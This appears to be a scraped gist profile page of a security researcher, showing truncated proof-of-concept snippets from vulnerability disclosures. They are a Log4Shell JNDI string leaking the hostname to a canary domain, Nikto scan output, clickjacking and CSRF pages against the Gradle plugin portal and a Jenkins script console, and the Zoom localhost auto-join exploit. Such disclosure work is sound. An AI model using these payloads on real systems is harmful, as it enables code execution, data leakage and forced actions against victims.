- ${jndi:ldap://x${hostName}.L4J.lile3fakwhyqg99zgj0yytxz7.canarytokens.com/a}
- @JLLeitschuh
- @JLLeitschuh@infosec.exchange
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package org.jlleitschuh.testing.security; | |
import org.gradle.api.Plugin; | |
import org.gradle.api.Project; | |
public class SecurityPlugin implements Plugin<Project> { | |
@Override | |
public void apply(final Project target) { | |
target.getLogger().lifecycle("A security plugin. I'm malicious!"); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
buildscript { | |
repositories { | |
gradlePluginPortal() | |
} | |
dependencies { | |
/* | |
* In practice, this attack could have been leveraged against any plugin on | |
* the Gradle plugin portal. | |
* I created my own plugin for testing purposes. | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
nikto -h https://plugins.gradle.org/ | |
- Nikto v2.1.6 | |
--------------------------------------------------------------------------- | |
+ Target IP: 104.16.174.166 | |
+ Target Hostname: plugins.gradle.org | |
+ Target Port: 443 | |
--------------------------------------------------------------------------- | |
+ SSL Info: Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=ssl473435.cloudflaressl.com | |
Altnames: ssl473435.cloudflaressl.com, *.gradle.org, gradle.org | |
Ciphers: ECDHE-ECDSA-CHACHA20-POLY1305 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<style> | |
iframe { /* iframe from the victim site */ | |
width: 400px; | |
height: 100px; | |
position: absolute; | |
top: 0; | |
left: -20px; | |
opacity: 0.5; /* in real opacity:0 */ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<html> | |
<head></head> | |
<body> | |
<form action="https://plugins.gradle.org/user" method="POST" class="edit-profile-form" _lpchecked="1"> | |
<dl id="name_field"> | |
<dt> | |
<label for="name"></label> | |
</dt> | |
<dd> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<body> | |
<form action="http://corperate-jenkins.lab.com:8080/script" method="POST"> | |
<input type="hidden" name="script" | |
value="println 'Hello! I just ran an arbitrary bit of code on Jenkins!'; println Jenkins.instance.slaves"/> | |
<input type="submit" value="Submit!"/> | |
</form> | |
</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* ****************************************************************************** */ | |
// MIT License | |
// | |
// Copyright (c) 2019 Hewlett Packard Enterprise Development LP | |
// | |
// Permission is hereby granted, free of charge, to any person obtaining a copy | |
// of this software and associated documentation files (the "Software"), to deal | |
// in the Software without restriction, including without limitation the rights | |
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell | |
// copies of the Software, and to permit persons to whom the Software is |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://localhost:19421/launch?action=join&confno=[some confrence number] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<iframe src="https://zoom.us/j/492468757"/> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<body> | |
<script> | |
// It's actually better if this number isn't a valid zoom number. | |
var attackNumber = "694138052" | |
setInterval(function(){ | |
var image = document.createElement("img"); | |
// Use a date to bust the browser's cache | |
var date = new Date(); | |
image.src = "http://localhost:19421/launch?action=join&confno=" + attackNumber + "&" + date.getTime(); |